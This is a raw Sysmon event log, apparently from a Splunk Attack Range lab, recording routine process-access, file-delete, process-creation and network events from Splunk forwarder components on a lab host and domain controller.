08:11:28.293{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.264{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.262{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0F296D2BDF2D9DBFEE17A6077AE3A3,SHA256=A588CB830FF7BAC7351141B0933173AF180F463E49D68FCB2649552490E4DD51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.262{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F77AE8FF072E8344E902361FE3CE437C,SHA256=81717B6C968203E8B7B41EA726A25528C4B60DDA1AB537941D97080A5A5D2F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:29.949{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E1CB0331A2B8D73A16537F5BDA1A4C2,SHA256=296792F0E129F52482FC3DB3D1F00E2669B34D062C379970749FC7A145B7927C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:29.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059DA0C3DF420A7733038762B004F040,SHA256=CE9577B5DC089EBBDA0388004C313840EA7E9B021D2DE2CCC1705C3DDB7E05CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.285{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57517-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000811147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:29.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A6010FD77D91BB0AE33E3E41DA977FC,SHA256=8A0AC92816CB6854E9075CC7E2790D194731A87533F09E82F054633A94AAA4B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:30.965{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4274F880DFF7CB7DC0C1B8873F996BA,SHA256=3D2740C193404077F45416A11076C2F55CCE737609EE0BCAAA5288A84016E3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:30.246{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9C688D75039D58AE5BB855231F407E15,SHA256=9E2FF618E77A87A5DD926582240904D3196DBD379ECB28BC96A54C1205288C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:30.082{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6A845B52A7D9095B97520B4182C91B,SHA256=BF5512D0C3FE3F0B6FD7F6EFF854C910642E602101D89BDEDDD8E6D8ADCDEEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:31.965{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B52FD06C4296632843C696156CA258,SHA256=323D0497EDAAC6FF6208B8886A6027267E1889FD1397551BA6D7E22237E751C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:31.097{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F762E670B4F07E6665AD947D7A015B39,SHA256=9712274B0CC70191E630361C78B321598777EDD57B251B9730B95F835D5B7456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:32.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C9F6F8541E6AC9CAB890CE860052999,SHA256=4781D8F6DE88DA53E5906BD3D01ECF87E60DA5B9B8017C270960ABD241544FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.099{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FC26942CCD586D59FDFA80F887FC2B,SHA256=B67593C77A511544CAE39DA8A2DB29C3B96D5180681AFAAA639685741659885F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:33.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F732F2A917C1DF27F49491825B8C41,SHA256=3DE3842B5B0D12B30627CDC861E5939A88842D4B83230A47813804649CF6796B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:33.395{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57518-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000811154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:34.058{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6DFEF8E8AA9A4BA2F8C748202419CC3,SHA256=0B6E521AA79EA225118ADC1D112F76D74B40E14BE213D96AA739DBC680C37179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121BE546DDDE7CA02D3FF574EE6AF629,SHA256=D0130750021F35E3B9E0EF9F82FB129369E25E852FCA41CCF9292B03535F77FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:35.094{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDDF146EACEC8B6C98355AC1668B284,SHA256=93E5E94980A1B90C6DD3380132EEB784EC0F806E5FF4478E052B4ABD80E562D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:35.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A439313CE4465A36A4AB26E0C6AB0BB,SHA256=1955C2F42A5F576ACD9BFFBD7EA81C0C573237B873F4906C62A421D6A2A4B2FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:26.736{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62023-false10.0.1.12-8000- 23542300x8000000000000000811157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:36.110{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E37AB3166BD5C0A9827C5D9A61EB32,SHA256=96B6AC0DF1924E038203EB47180B2A8D2EEC7B4102E3196D46D30FF9324799A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:36.180{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A0790396909CAFC321D447D0FC08C5F,SHA256=BCEF7831AE461312F136DB8987A8A455ACE299A1A6CC6FC0A4C1D7199AAD0D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:37.196{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=855D299EDB810D90082B463535608F41,SHA256=832395CDF80529E91709F88B9C165C4926406E23ED7B014D9A026165B43BD10D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:37.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EE51E291633A770E935842AA914B24,SHA256=5661D884C3B8BB8B38DA05FA7E437999383D4DC22D53280A16344D208265FB7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.711{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=888488DF46D0495A63E1BF4F7FB8F5E0,SHA256=D72F42878B2DC7B6BC6A7A352606119A10F5078D8B5BC15753A435797AD89412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.216{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19BA031B37905976047DD44A71138A05,SHA256=A6B0C0904C1B8B17889DD004527C774D591818B7BE8F3ED86D08EFB3FFF215DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:38.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 